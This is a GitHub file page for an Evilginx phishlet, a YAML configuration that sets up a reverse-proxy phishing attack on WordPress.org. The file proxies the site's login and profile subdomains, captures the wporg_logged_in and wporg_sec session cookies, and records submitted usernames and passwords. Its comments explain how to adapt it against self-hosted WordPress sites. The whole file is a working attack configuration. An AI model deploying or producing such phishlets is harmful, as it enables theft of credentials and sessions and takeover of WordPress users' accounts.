forked from kgretzky/evilginx2
-
Notifications
You must be signed in to change notification settings - Fork 0
/
wordpress.org.yaml
96 lines (90 loc) · 2.61 KB
/
wordpress.org.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
# Evilginx phishlet configuration file for WordPress.org.
#
# This is a phishing configuration for the main WordPress.org domain,
# it is *not* immediately useful for phishing self-hosted sites that
# run on the WordPress software.
#
# For such self-hosted sites, some modifications are needed. Refer to
# the comments in this file for some guidance on creating a phishlet
# to use against self-hosted WordPress sites.
---
name: 'WordPress.org'
author: '@meitar'
min_ver: '2.3.0'
proxy_hosts:
# Proxy the primary domain.
- phish_sub: ''
orig_sub: ''
domain: 'wordpress.org'
session: true
is_landing: true
# These proxied should be removed when phishing self-hosted sites.
- phish_sub: 'login'
orig_sub: 'login'
domain: 'wordpress.org'
session: true
is_landing: false
- phish_sub: 'make'
orig_sub: 'make'
domain: 'wordpress.org'
session: true
is_landing: false
- phish_sub: 'profiles'
orig_sub: 'profiles'
domain: 'wordpress.org'
session: true
is_landing: false
sub_filters: []
# For self-hosted WordPress sites, you may find it easier to use a
# regular expression to match session cookies, as the cookie names
# are produced unqiely per-site. This can be done as follows:
#
# ```yaml
# - domain: 'self-hosted-domain.com'
# keys:
# - 'wordpress_sec_.*,regexp'
# - 'wordpress_logged_in_.*,regexp'
# ```
#
# If you do choose to use the regular expression facility, you
# will also then need to use the `auth_urls` dictionary to define
# when Evilginx should actually capture these tokens. Something
# like this should do the trick:
#
# ```yaml
# auth_urls:
# - '.*/wp-admin/.*'
# ```
#
# The above ensures that the `auth_tokens` are noticed whenever
# the phished user makes requests to URLs containing `wp-admin`.
#
# For the WordPress.org service itself, however, none of the above is
# necessary, and the following simple `auth_tokens` dictionary should
# work just fine.
auth_tokens:
- domain: '.wordpress.org'
keys: ['wporg_logged_in', 'wporg_sec']
credentials:
username:
key: 'log'
search: '(.*)'
type: 'post'
password:
key: 'pwd'
search: '(.*)'
type: 'post'
# For a self-hosted WordPress site, you'll probably want to define the
# `login` dictionary here as follows:
#
# ```yaml
# login:
# domain: 'self-hosted-domain.com'
# path: '/wp-login.php'
# ```
#
# Some WordPress plugins, such as WooCommerce, change the URL of the
# login page. You'll want to examine the specific site for this.
login:
domain: 'login.wordpress.org'
path: '/'